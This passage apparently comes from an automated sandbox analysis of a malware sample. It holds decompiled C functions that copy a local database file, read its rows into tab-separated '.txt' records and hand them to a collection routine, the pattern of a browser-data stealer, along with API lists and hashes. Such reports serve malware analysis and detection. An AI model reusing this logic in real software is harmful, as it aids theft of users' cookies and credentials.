										 *(_t271 - 0x18) =  *(_t271 - 0x18) + 1;
										_t255 =  *(_t271 - 0x20);
										_t225 = 0;
										__eflags =  *(_t271 - 0x18) -  *((intOrPtr*)(_t271 - 0x28));
										if(__eflags < 0) {
											continue;
										} else {
											goto L27;
										}
									}
									goto L1;
								}
							}
						}
					}
				}
				L1:
				if( *(_t271 - 0x10) == _t225) {
					goto L4;
				}
				_push( *(_t271 - 0x10));
				goto L3;
			}
































                                                                    0x004113e3
                                                                    0x004113e3
                                                                    0x004113e4
                                                                    0x004113e7
                                                                    0x004113eb
                                                                    0x004113f2
                                                                    0x004113f5
                                                                    0x004113fc
                                                                    0x00411404
                                                                    0x0041140d
                                                                    0x00411411
                                                                    0x00411414
                                                                    0x00411416
                                                                    0x00411417
                                                                    0x0041141a
                                                                    0x0041141d
                                                                    0x00411420
                                                                    0x00411423
                                                                    0x00411426
                                                                    0x00411429
                                                                    0x0041142c
                                                                    0x0041142f
                                                                    0x00411432
                                                                    0x00411435
                                                                    0x0041143b
                                                                    0x0041143c
                                                                    0x00411440
                                                                    0x0041144c
                                                                    0x0041145e
                                                                    0x00411462
                                                                    0x004114b6
                                                                    0x004114bb
                                                                    0x004114be
                                                                    0x004114c1
                                                                    0x004114ce
                                                                    0x004114d4
                                                                    0x004114d4
                                                                    0x004114d7
                                                                    0x004114da
                                                                    0x004114df
                                                                    0x004115aa
                                                                    0x00000000
                                                                    0x004114e5
                                                                    0x004114e8
                                                                    0x004114e9
                                                                    0x004114ed
                                                                    0x004114fb
                                                                    0x00411513
                                                                    0x00411515
                                                                    0x00411517
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00411524
                                                                    0x00411529
                                                                    0x0041152c
                                                                    0x0041152f
                                                                    0x0041153c
                                                                    0x00411542
                                                                    0x00411542
                                                                    0x00411548
                                                                    0x00411549
                                                                    0x00411554
                                                                    0x0041155e
                                                                    0x00411576
                                                                    0x00411578
                                                                    0x0041157a
                                                                    0x00000000
                                                                    0x00411580
                                                                    0x00411587
                                                                    0x0041158c
                                                                    0x0041158f
                                                                    0x00411592
                                                                    0x0041159f
                                                                    0x004115a5
                                                                    0x004115a5
                                                                    0x004115ad
                                                                    0x004115b0
                                                                    0x004115b1
                                                                    0x004115be
                                                                    0x004115c8
                                                                    0x004115e0
                                                                    0x004115e2
                                                                    0x004115e5
                                                                    0x004115e7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004115f4
                                                                    0x004115f9
                                                                    0x004115fc
                                                                    0x004115ff
                                                                    0x0041160c
                                                                    0x0041160c
                                                                    0x0041161f
                                                                    0x00411624
                                                                    0x0041162e
                                                                    0x00411634
                                                                    0x00411637
                                                                    0x00411639
                                                                    0x0041147a
                                                                    0x0041147a
                                                                    0x00411481
                                                                    0x0041148b
                                                                    0x0041148d
                                                                    0x00411498
                                                                    0x004114a3
                                                                    0x004114a8
                                                                    0x00000000
                                                                    0x0041163f
                                                                    0x00411643
                                                                    0x0041164a
                                                                    0x0041164d
                                                                    0x00411650
                                                                    0x00411656
                                                                    0x0041166b
                                                                    0x00411670
                                                                    0x00411674
                                                                    0x00411676
                                                                    0x00411676
                                                                    0x0041167f
                                                                    0x00411684
                                                                    0x0041168d
                                                                    0x00411698
                                                                    0x0041169c
                                                                    0x004116ac
                                                                    0x004116bb
                                                                    0x004116bb
                                                                    0x004116c1
                                                                    0x004116cb
                                                                    0x004116d1
                                                                    0x004116d4
                                                                    0x004116d7
                                                                    0x004116d9
                                                                    0x0041146c
                                                                    0x00411474
                                                                    0x00000000
                                                                    0x004116df
                                                                    0x004116df
                                                                    0x004116e0
                                                                    0x004116e1
                                                                    0x004116e6
                                                                    0x004116f4
                                                                    0x004116fa
                                                                    0x004116fd
                                                                    0x00411700
                                                                    0x00411703
                                                                    0x00411790
                                                                    0x00411790
                                                                    0x00411797
                                                                    0x0041179f
                                                                    0x004117a6
                                                                    0x004117a9
                                                                    0x004117ac
                                                                    0x004117b7
                                                                    0x004117bb
                                                                    0x004117c5
                                                                    0x004117c9
                                                                    0x004117d4
                                                                    0x004117e6
                                                                    0x004117f0
                                                                    0x004117f4
                                                                    0x004117ff
                                                                    0x00411803
                                                                    0x00411808
                                                                    0x00411808
                                                                    0x00411816
                                                                    0x0041181c
                                                                    0x00411823
                                                                    0x00411829
                                                                    0x0041182b
                                                                    0x00411836
                                                                    0x00411840
                                                                    0x00411845
                                                                    0x00411848
                                                                    0x0041184b
                                                                    0x00411853
                                                                    0x00411854
                                                                    0x00411855
                                                                    0x00411864
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00411709
                                                                    0x00411709
                                                                    0x0041170c
                                                                    0x0041170d
                                                                    0x00411710
                                                                    0x0041171b
                                                                    0x00411725
                                                                    0x00411737
                                                                    0x0041173d
                                                                    0x00411740
                                                                    0x00411742
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041174f
                                                                    0x00411754
                                                                    0x00411757
                                                                    0x0041175a
                                                                    0x00411767
                                                                    0x0041176d
                                                                    0x0041176d
                                                                    0x00411774
                                                                    0x00411777
                                                                    0x0041177c
                                                                    0x00411782
                                                                    0x00411785
                                                                    0x00411787
                                                                    0x0041178a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041178a
                                                                    0x00000000
                                                                    0x00411709
                                                                    0x004116d9
                                                                    0x00411639
                                                                    0x0041157a
                                                                    0x004114df
                                                                    0x00411464
                                                                    0x00411467
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00411469
                                                                    0x00000000

                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 004113FC
                                                                      • Part of subcall function 004112D0: __EH_prolog3_GS.LIBCMT ref: 004112D7
                                                                      • Part of subcall function 004112D0: lstrlen.KERNEL32(?,0000005C,00411449,?,?,00000024), ref: 004112FB
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,00000024), ref: 00411451
                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000024), ref: 00411458
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,00000024), ref: 0041146D
                                                                    • HeapFree.KERNEL32(00000000,?,?,00000024), ref: 00411474
                                                                    • _strcpy_s.LIBCMT ref: 004114B6
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,00000024), ref: 004114C7
                                                                    • HeapFree.KERNEL32(00000000,?,?,00000024), ref: 004114CE
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?,00000024), ref: 004114F4
                                                                    • HeapFree.KERNEL32(00000000,?,?,00000024), ref: 004114FB
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,00000024), ref: 00411506
                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000024), ref: 0041150D
                                                                    • _strcpy_s.LIBCMT ref: 00411524
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000024), ref: 00411535
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000024), ref: 0041153C
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00000024), ref: 00411557
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000024), ref: 0041155E
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,00000024), ref: 00411569
                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000024), ref: 00411570
                                                                    • _strcpy_s.LIBCMT ref: 00411587
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000024), ref: 00411598
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000024), ref: 0041159F
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?,00000024), ref: 004115C1
                                                                    • HeapFree.KERNEL32(00000000,?,?,00000024), ref: 004115C8
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,00000024), ref: 004115D3
                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000024), ref: 004115DA
                                                                    • _strcpy_s.LIBCMT ref: 004115F4
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000024), ref: 00411605
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000024), ref: 0041160C
                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000024), ref: 00411613
                                                                    • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,00000024), ref: 00411627
                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000024), ref: 0041162E
                                                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,00000024), ref: 0041165A
                                                                    • _strcpy_s.LIBCMT ref: 0041167F
                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,00000001,00000000,?,00000008,00000000,?,?,?,?,?,00000024), ref: 004116A5
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000024), ref: 004116AC
                                                                    • lstrlen.KERNEL32(?,?,?,?,?,?,00000024), ref: 004116B5
                                                                    • GetProcessHeap.KERNEL32(00000008,00000001,?,?,?,?,?,00000024), ref: 004116C4
                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000024), ref: 004116CB
                                                                    • _strcpy_s.LIBCMT ref: 004116E1
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 004116ED
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 004116F4
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 0041171E
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 00411725
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 00411730
                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 00411737
                                                                    • _strcpy_s.LIBCMT ref: 0041174F
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411760
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 00411767
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 0041180F
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000024), ref: 00411816
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free$Alloc_strcpy_s$lstrlen$H_prolog3H_prolog3_
                                                                    • String ID:
                                                                    • API String ID: 2500175858-0
                                                                    • Opcode ID: ced4027cde9ca0b36e7e5c8dbd4773bde96a33cd44b336eb9152a3a3089ad117
                                                                    • Instruction ID: da2d975b3622cb05f64ff30bbcd312147f207bbfc31e733f449cecb09bbf03f8
                                                                    • Opcode Fuzzy Hash: ced4027cde9ca0b36e7e5c8dbd4773bde96a33cd44b336eb9152a3a3089ad117
                                                                    • Instruction Fuzzy Hash: D5E12FB5800259AFDF00EFE1DC49AEEBB79FF09305F05442AFA15B2162D7394944CB69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040EC59 Relevance: 70.3, APIs: 39, Strings: 1, Instructions: 281stringmemoryfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 36%
                                                                    			E0040EC59(void* __ebx, CHAR* __ecx, CHAR* __edx, CHAR* __edi, void* __esi, void* __eflags) {
				void* _t84;
				void* _t113;
				CHAR* _t117;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t125;
				CHAR* _t126;
				CHAR* _t127;
				CHAR* _t128;
				CHAR* _t149;
				void* _t153;
				void* _t156;
				void* _t157;
				CHAR* _t159;
				CHAR* _t168;
				CHAR* _t181;
				void* _t186;
				void* _t187;
				void* _t189;
				void* _t190;

				_t180 = __edi;
				_push(0x264);
				E0042083E(E00434DCE, __ebx, __edi, __esi);
				_push( *0x445d8c);
				 *(_t186 - 0x248) =  *(_t186 + 8);
				 *((intOrPtr*)(_t186 - 0x26c)) =  *((intOrPtr*)(_t186 + 0xc));
				_t159 = __edx;
				 *((intOrPtr*)(_t186 - 0x260)) =  *((intOrPtr*)(_t186 + 0x10));
				_t183 = __ecx;
				_push(__edx);
				 *(_t186 - 0x244) = __ecx;
				 *((intOrPtr*)(_t186 - 0x268)) =  *((intOrPtr*)(_t186 + 0x14));
				if( *0x446458() == 0) {
					L2:
					 *(_t186 - 0x244) = 0x43c8d8;
					goto L4;
				} else {
					_t156 =  *0x446458(__edx,  *0x445db0);
					_t194 = _t156;
					if(_t156 != 0) {
						_t157 =  *0x446458(__ecx,  *0x446044);
						__eflags = _t157;
						if(_t157 != 0) {
							L4:
							_t180 = 0;
							E00426300(_t186 - 0x220, 0, 0x104);
							lstrcatA(_t186 - 0x220,  *0x445fe0);
							_t84 = 0x1a;
							lstrcatA(_t186 - 0x220, E00415EF6(_t84, _t194));
							CopyFileA( *(_t186 - 0x248), _t186 - 0x220, 1);
							E00426300(_t186 - 0x118, 0, 0x104);
							_t189 = _t187 + 0x18;
							lstrcatA(_t186 - 0x118, 0x43c8e0);
							lstrcatA(_t186 - 0x118,  *0x44603c);
							lstrcatA(_t186 - 0x118, 0x43c8e0);
							lstrcatA(_t186 - 0x118, _t159);
							lstrcatA(_t186 - 0x118, "_");
							lstrcatA(_t186 - 0x118,  *(_t186 - 0x244));
							lstrcatA(_t186 - 0x118, ".txt");
							_t183 =  *0x445d20; // 0x4c986c0
							_push(_t186 - 0x254);
							_push(_t186 - 0x220);
							if( *0x446248() == 0) {
								_t113 =  *0x4461fc( *((intOrPtr*)(_t186 - 0x254)), _t183, 0xffffffff, _t186 - 0x240, 0);
								_t190 = _t189 + 0x14;
								if(_t113 == 0) {
									_t117 = HeapAlloc(GetProcessHeap(), 0, 0xf423f);
									_push( *((intOrPtr*)(_t186 - 0x240)));
									_t159 = _t117;
									 *(_t186 - 0x244) = _t159;
									if( *0x446218() == 0x64) {
										_t183 = "\t";
										while(1) {
											_t123 =  *0x446238( *((intOrPtr*)(_t186 - 0x240)), _t180);
											 *(_t186 - 0x25c) = _t123;
											_t124 =  *0x446238( *((intOrPtr*)(_t186 - 0x240)), 1);
											_t181 = _t124;
											 *(_t186 - 0x250) = _t181;
											_t125 =  *0x446238( *((intOrPtr*)(_t186 - 0x240)), 2);
											 *(_t186 - 0x258) = _t125;
											_t126 =  *0x446238( *((intOrPtr*)(_t186 - 0x240)), 3);
											 *(_t186 - 0x24c) = _t126;
											_t127 =  *0x446238( *((intOrPtr*)(_t186 - 0x240)), 4);
											 *(_t186 - 0x248) = _t127;
											_t128 =  *0x446238( *((intOrPtr*)(_t186 - 0x240)), 5);
											_t190 = _t190 + 0x30;
											_push("0");
											_push(_t181);
											 *(_t186 - 0x264) = _t128;
											if( *0x446458() != 0) {
												_push( *0x44612c);
											} else {
												_push( *0x445d70);
											}
											asm("stosd");
											lstrcatA( *(_t186 - 0x250), ??);
											_t180 =  *(_t186 - 0x24c);
											_push("0");
											_push( *(_t186 - 0x24c));
											if( *0x446458() != 0) {
												_push( *0x44612c);
											} else {
												_push( *0x445d70);
											}
											asm("stosd");
											lstrcatA( *(_t186 - 0x24c), ??);
											_t168 =  *(_t186 - 0x248);
											if( *_t168 == 0x2d) {
												_t180 = _t168;
												asm("stosd");
												lstrcatA(_t168, "0");
											}
											lstrcatA(_t159,  *(_t186 - 0x25c));
											lstrcatA(_t159, _t183);
											lstrcatA(_t159,  *(_t186 - 0x250));
											lstrcatA(_t159, _t183);
											lstrcatA(_t159,  *(_t186 - 0x258));
											lstrcatA(_t159, _t183);
											lstrcatA(_t159,  *(_t186 - 0x24c));
											lstrcatA(_t159, _t183);
											lstrcatA(_t159,  *(_t186 - 0x248));
											lstrcatA(_t159, _t183);
											lstrcatA(_t159,  *(_t186 - 0x264));
											lstrcatA(_t159, _t183);
											_t149 = E0040E874(_t186 - 0x23c,  *((intOrPtr*)(_t186 - 0x260)),  *0x44622c( *((intOrPtr*)(_t186 - 0x240)), 6,  *0x446224( *((intOrPtr*)(_t186 - 0x240)), 6,  *((intOrPtr*)(_t186 - 0x26c)))), _t180, _t183, 0);
											 *(_t186 - 4) =  *(_t186 - 4) & 0x00000000;
											if(_t149[0x14] >= 0x10) {
												_t149 =  *_t149;
											}
											lstrcatA( *(_t186 - 0x244), _t149);
											 *(_t186 - 4) =  *(_t186 - 4) | 0xffffffff;
											E00404354(_t186 - 0x23c, 1, 0);
											lstrcatA( *(_t186 - 0x244), 0x43c8dc);
											_t153 =  *0x446218( *((intOrPtr*)(_t186 - 0x240)));
											_t159 =  *(_t186 - 0x244);
											if(_t153 != 0x64) {
												goto L20;
											}
											_t180 = 0;
											__eflags = 0;
										}
									}
									L20:
									E0041CE7C( *((intOrPtr*)(_t186 - 0x268)), _t186 - 0x118,  *0x446320(_t159), 3);
								}
								 *0x44621c( *((intOrPtr*)(_t186 - 0x240)));
								 *0x44624c( *((intOrPtr*)(_t186 - 0x254)));
							}
							DeleteFileA(_t186 - 0x220);
						}
					} else {
						goto L2;
					}
				}
				return E00420888(_t159, _t180, _t183);
			}























                                                                    0x0040ec59
                                                                    0x0040ec59
                                                                    0x0040ec63
                                                                    0x0040ec6b
                                                                    0x0040ec71
                                                                    0x0040ec7a
                                                                    0x0040ec83
                                                                    0x0040ec85
                                                                    0x0040ec8e
                                                                    0x0040ec90
                                                                    0x0040ec91
                                                                    0x0040ec97
                                                                    0x0040eca5
                                                                    0x0040ecb8
                                                                    0x0040ecb8
                                                                    0x00000000
                                                                    0x0040eca7
                                                                    0x0040ecae
                                                                    0x0040ecb4
                                                                    0x0040ecb6
                                                                    0x0040eccb
                                                                    0x0040ecd1
                                                                    0x0040ecd3
                                                                    0x0040ecd9
                                                                    0x0040ecdf
                                                                    0x0040ece9
                                                                    0x0040ecfe
                                                                    0x0040ed06
                                                                    0x0040ed14
                                                                    0x0040ed29
                                                                    0x0040ed38
                                                                    0x0040ed3d
                                                                    0x0040ed4d
                                                                    0x0040ed60
                                                                    0x0040ed6e
                                                                    0x0040ed7c
                                                                    0x0040ed8e
                                                                    0x0040eda1
                                                                    0x0040edb3
                                                                    0x0040edb9
                                                                    0x0040edc5
                                                                    0x0040edcc
                                                                    0x0040edd7
                                                                    0x0040edee
                                                                    0x0040edf4
                                                                    0x0040edf9
                                                                    0x0040ee0c
                                                                    0x0040ee12
                                                                    0x0040ee18
                                                                    0x0040ee1a
                                                                    0x0040ee2a
                                                                    0x0040ee30
                                                                    0x0040ee39
                                                                    0x0040ee40
                                                                    0x0040ee4e
                                                                    0x0040ee54
                                                                    0x0040ee62
                                                                    0x0040ee64
                                                                    0x0040ee6a
                                                                    0x0040ee78
                                                                    0x0040ee7e
                                                                    0x0040ee8c
                                                                    0x0040ee92
                                                                    0x0040eea0
                                                                    0x0040eea6
                                                                    0x0040eeac
                                                                    0x0040eeaf
                                                                    0x0040eeb4
                                                                    0x0040eeb5
                                                                    0x0040eec3
                                                                    0x0040eecd
                                                                    0x0040eec5
                                                                    0x0040eec5
                                                                    0x0040eec5
                                                                    0x0040eedb
                                                                    0x0040eedc
                                                                    0x0040eee2
                                                                    0x0040eee8
                                                                    0x0040eeed
                                                                    0x0040eef6
                                                                    0x0040ef00
                                                                    0x0040eef8
                                                                    0x0040eef8
                                                                    0x0040eef8
                                                                    0x0040ef0e
                                                                    0x0040ef0f
                                                                    0x0040ef15
                                                                    0x0040ef1e
                                                                    0x0040ef27
                                                                    0x0040ef2a
                                                                    0x0040ef2b
                                                                    0x0040ef2b
                                                                    0x0040ef38
                                                                    0x0040ef40
                                                                    0x0040ef4d
                                                                    0x0040ef55
                                                                    0x0040ef62
                                                                    0x0040ef6a
                                                                    0x0040ef77
                                                                    0x0040ef7f
                                                                    0x0040ef8c
                                                                    0x0040ef94
                                                                    0x0040efa1
                                                                    0x0040efa9
                                                                    0x0040efe4
                                                                    0x0040efeb
                                                                    0x0040eff3
                                                                    0x0040eff5
                                                                    0x0040eff5
                                                                    0x0040effe
                                                                    0x0040f004
                                                                    0x0040f012
                                                                    0x0040f022
                                                                    0x0040f02e
                                                                    0x0040f034
                                                                    0x0040f03e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040ee37
                                                                    0x0040ee37
                                                                    0x0040ee37
                                                                    0x0040ee39
                                                                    0x0040f044
                                                                    0x0040f05d
                                                                    0x0040f062
                                                                    0x0040f06b
                                                                    0x0040f078
                                                                    0x0040f07e
                                                                    0x0040f086
                                                                    0x0040f086
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040ecb6
                                                                    0x0040f091

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040EC63
                                                                    • StrCmpCA.SHLWAPI(?,00000264,00410360,?,?,?,?), ref: 0040EC9D
                                                                    • StrCmpCA.SHLWAPI(?,?,00000264,00410360,?,?,?,?), ref: 0040ECAE
                                                                    • StrCmpCA.SHLWAPI(?,?,?,00000264,00410360,?,?,?,?), ref: 0040ECCB
                                                                    • _memset.LIBCMT ref: 0040ECE9
                                                                    • lstrcatA.KERNEL32(?,?,?,?), ref: 0040ECFE
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040ED14
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040ED29
                                                                    • _memset.LIBCMT ref: 0040ED38
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 0040ED4D
                                                                    • lstrcatA.KERNEL32(?), ref: 0040ED60
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 0040ED6E
                                                                    • lstrcatA.KERNEL32(?), ref: 0040ED7C
                                                                    • lstrcatA.KERNEL32(?,0043F090), ref: 0040ED8E
                                                                    • lstrcatA.KERNEL32(?,0043C8D8), ref: 0040EDA1
                                                                    • lstrcatA.KERNEL32(?,.txt), ref: 0040EDB3
                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040EE05
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040EE0C
                                                                    • StrCmpCA.SHLWAPI(00000000,00438004), ref: 0040EEBB
                                                                    • lstrcatA.KERNEL32(?), ref: 0040EEDC
                                                                    • StrCmpCA.SHLWAPI(?,00438004), ref: 0040EEEE
                                                                    • lstrcatA.KERNEL32(?), ref: 0040EF0F
                                                                    • lstrcatA.KERNEL32(?,00438004), ref: 0040EF2B
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040EF38
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040EF40
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040EF4D
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040EF55
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040EF62
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040EF6A
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040EF77
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040EF7F
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040EF8C
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040EF94
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040EFA1
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040EFA9
                                                                      • Part of subcall function 0040E874: __EH_prolog3_GS.LIBCMT ref: 0040E87B
                                                                      • Part of subcall function 0040E874: _memset.LIBCMT ref: 0040E8C9
                                                                      • Part of subcall function 0040E874: LocalAlloc.KERNEL32 ref: 0040E904
                                                                    • lstrcatA.KERNEL32(0043C8D8,00000000), ref: 0040EFFE
                                                                    • lstrcatA.KERNEL32(0043C8D8,0043C8DC,00000001,00000000), ref: 0040F022
                                                                    • lstrlen.KERNEL32(00000000), ref: 0040F045
                                                                    • DeleteFileA.KERNEL32(?), ref: 0040F086
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$_memset$AllocFileH_prolog3_Heap$CopyDeleteLocalProcesslstrlen
                                                                    • String ID: .txt
                                                                    • API String ID: 2450725088-2195685702
                                                                    • Opcode ID: 5e6ff73c4ecc493a3ec27dd4601ac94f74ff728cbadee09f34a950b3c40534fe
                                                                    • Instruction ID: 94be65da8792f97c9082f74c3879f6f0532abd93c2d4ce4e7d34510d3fc5c33e
                                                                    • Opcode Fuzzy Hash: 5e6ff73c4ecc493a3ec27dd4601ac94f74ff728cbadee09f34a950b3c40534fe
                                                                    • Instruction Fuzzy Hash: 82B12075900218AFDF206F60EC4DEDEBB79FB0A321F1104B5F609A2161DB358A94DF19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040FB18 Relevance: 65.0, APIs: 34, Strings: 3, Instructions: 235stringmemoryfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 34%
                                                                    			E0040FB18(CHAR* __ecx, CHAR* __edx, CHAR* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v544;
				CHAR* _v548;
				CHAR* _v552;
				char _v556;
				CHAR* _v560;
				intOrPtr _v564;
				CHAR* _v568;
				CHAR* _v572;
				CHAR* _v576;
				CHAR* _v580;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				void* _t63;
				void* _t92;
				CHAR* _t96;
				CHAR* _t102;
				CHAR* _t103;
				CHAR* _t104;
				CHAR* _t105;
				CHAR* _t106;
				CHAR* _t107;
				CHAR* _t108;
				CHAR* _t130;
				CHAR* _t131;
				CHAR* _t144;
				CHAR* _t147;
				signed int _t148;
				void* _t149;
				void* _t151;
				void* _t152;
				void* _t154;

				_t142 = __edx;
				_t55 =  *0x443674; // 0x393162b1
				_v8 = _t55 ^ _t148;
				_v548 = _a4;
				_v564 = _a8;
				_t130 = __ecx;
				_t143 = __edx;
				E00426300( &_v540, 0, 0x104);
				lstrcatA( &_v540,  *0x445fe0);
				_t63 = 0x1a;
				lstrcatA( &_v540, E00415EF6(_t63, _t154));
				CopyFileA(_t130,  &_v540, 1);
				_t131 = 0;
				E00426300( &_v276, 0, 0x104);
				_t151 = _t149 + 0x18;
				lstrcatA( &_v276, 0x43c8e0);
				lstrcatA( &_v276,  *0x44603c);
				lstrcatA( &_v276, 0x43c8e0);
				lstrcatA( &_v276, _v548);
				lstrcatA( &_v276, "_");
				lstrcatA( &_v276, _t143);
				lstrcatA( &_v276, ".txt");
				_t147 =  *0x445be4; // 0x4c9cb38
				_push( &_v556);
				_push( &_v540);
				if( *0x446248() == 0) {
					_t92 =  *0x4461fc(_v556, _t147, 0xffffffff,  &_v544, 0);
					_t152 = _t151 + 0x14;
					if(_t92 == 0) {
						_t96 = HeapAlloc(GetProcessHeap(), 0, 0xf423f);
						_push(_v544);
						_t131 = _t96;
						if( *0x446218() == 0x64) {
							_t147 = "\t";
							do {
								_t102 =  *0x446238(_v544, 0);
								_v572 = _t102;
								_t103 =  *0x446238(_v544, 1);
								_t144 = _t103;
								_v548 = _t144;
								_t104 =  *0x446238(_v544, 2);
								_v560 = _t104;
								_t105 =  *0x446238(_v544, 3);
								_v552 = _t105;
								_t106 =  *0x446238(_v544, 4);
								_v580 = _t106;
								_t107 =  *0x446238(_v544, 5);
								_v568 = _t107;
								_t108 =  *0x446238(_v544, 6);
								_t152 = _t152 + 0x38;
								_push("0");
								_push(_t144);
								_v576 = _t108;
								if( *0x446458() != 0) {
									_push("FALSE");
								} else {
									_push("TRUE");
								}
								asm("stosd");
								lstrcatA(_v548, ??);
								_t143 = _v552;
								_push("0");
								_push(_v552);
								if( *0x446458() != 0) {
									_push("FALSE");
								} else {
									_push("TRUE");
								}
								asm("stosd");
								lstrcatA(_v552, ??);
								lstrcatA(_t131, _v572);
								lstrcatA(_t131, _t147);
								lstrcatA(_t131, _v548);
								lstrcatA(_t131, _t147);
								lstrcatA(_t131, _v560);
								lstrcatA(_t131, _t147);
								lstrcatA(_t131, _v552);
								lstrcatA(_t131, _t147);
								lstrcatA(_t131, _v580);
								lstrcatA(_t131, _t147);
								lstrcatA(_t131, _v568);
								lstrcatA(_t131, _t147);
								lstrcatA(_t131, _v576);
								lstrcatA(_t131, 0x43c8dc);
								_push(_v544);
							} while ( *0x446218() == 0x64);
						}
						E0041CE7C(_v564,  &_v276,  *0x446320(_t131), 3);
					}
					 *0x44621c(_v544);
					 *0x44624c(_v556);
				}
				return E0041DA9B(DeleteFileA( &_v540), _t131, _v8 ^ _t148, _t142, _t143, _t147);
			}







































                                                                    0x0040fb18
                                                                    0x0040fb21
                                                                    0x0040fb28
                                                                    0x0040fb31
                                                                    0x0040fb40
                                                                    0x0040fb4f
                                                                    0x0040fb51
                                                                    0x0040fb53
                                                                    0x0040fb68
                                                                    0x0040fb70
                                                                    0x0040fb7e
                                                                    0x0040fb8e
                                                                    0x0040fb95
                                                                    0x0040fb9f
                                                                    0x0040fba4
                                                                    0x0040fbb4
